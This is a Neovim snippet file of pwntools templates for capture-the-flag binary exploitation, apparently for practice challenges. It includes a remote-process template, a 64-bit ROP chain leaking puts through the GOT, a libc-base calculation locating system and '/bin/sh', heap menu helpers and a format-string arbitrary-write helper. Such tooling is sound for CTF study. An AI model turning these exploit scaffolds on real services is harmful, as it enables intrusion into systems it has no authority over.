nvim-config/snippets/ctf/pwn.json

{
  "Basic Pwntools Template": {
    "prefix": "pwn-basic",
    "body": [
      "from pwn import *",
      "",
      "context.log_level = 'debug'",
      "context.arch = '${1:amd64}'",
      "",
      "LOCAL = True",
      "if LOCAL:",
      "    p = process('./${2:binary}')",
      "    #libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')",
      "else:",
      "    p = remote('${3:ip}', ${4:port})",
      "    #libc = ELF('./libc.so.6')",
      "",
      "elf = ELF('./${2:binary}')",
      "",
      "$0",
      "p.interactive()"
    ]
  },

  "ROP Chain 64bit": {
    "prefix": "pwn-rop64",
    "body": [
      "puts_plt = elf.plt['puts']",
      "puts_got = elf.got['puts']",
      "main_addr = elf.symbols['main']",
      "",
      "pop_rdi = 0x400683  # ROPgadget --binary ./binary --only \"pop|ret\"",
      "ret = 0x40028e      # stack alignment",
      "",
      "payload = flat([",
      "    b'A'*${1:offset},",
      "    p64(pop_rdi),",
      "    p64(puts_got),",
      "    p64(puts_plt),",
      "    p64(main_addr)",
      "])",
      "$0"
    ]
  },

  "Heap Functions": {
    "prefix": "pwn-heap",
    "body": [
      "def add(size, content):",
      "    p.sendlineafter('Choice:', '1')",
      "    p.sendlineafter('Size:', str(size))",
      "    p.sendafter('Content:', content)",
      "",
      "def delete(index):",
      "    p.sendlineafter('Choice:', '2')",
      "    p.sendlineafter('Index:', str(index))",
      "",
      "def edit(index, content):",
      "    p.sendlineafter('Choice:', '3')",
      "    p.sendlineafter('Index:', str(index))",
      "    p.sendafter('Content:', content)",
      "",
      "def show(index):",
      "    p.sendlineafter('Choice:', '4')",
      "    p.sendlineafter('Index:', str(index))",
      "$0"
    ]
  },

  "Libc Leak": {
    "prefix": "pwn-libc",
    "body": [
      "puts_leak = u64(p.recvuntil('\\n', drop=True).ljust(8, b'\\x00'))",
      "libc_base = puts_leak - libc.symbols['puts']",
      "system_addr = libc_base + libc.symbols['system']",
      "binsh_addr = libc_base + next(libc.search(b'/bin/sh'))",
      "$0"
    ]
  },

  "GDB Debug": {
    "prefix": "pwn-gdb",
    "body": ["gdb.attach(p, '''", "b *${1:0x400789}", "c", "''')", "$0"]
  },

  "Format String": {
    "prefix": "pwn-fmt",
    "body": [
      "def write_anywhere(addr, value):",
      "    payload = fmtstr_payload(${1:offset}, {addr: value})",
      "    p.sendline(payload)",
      "$0"
    ]
  }
}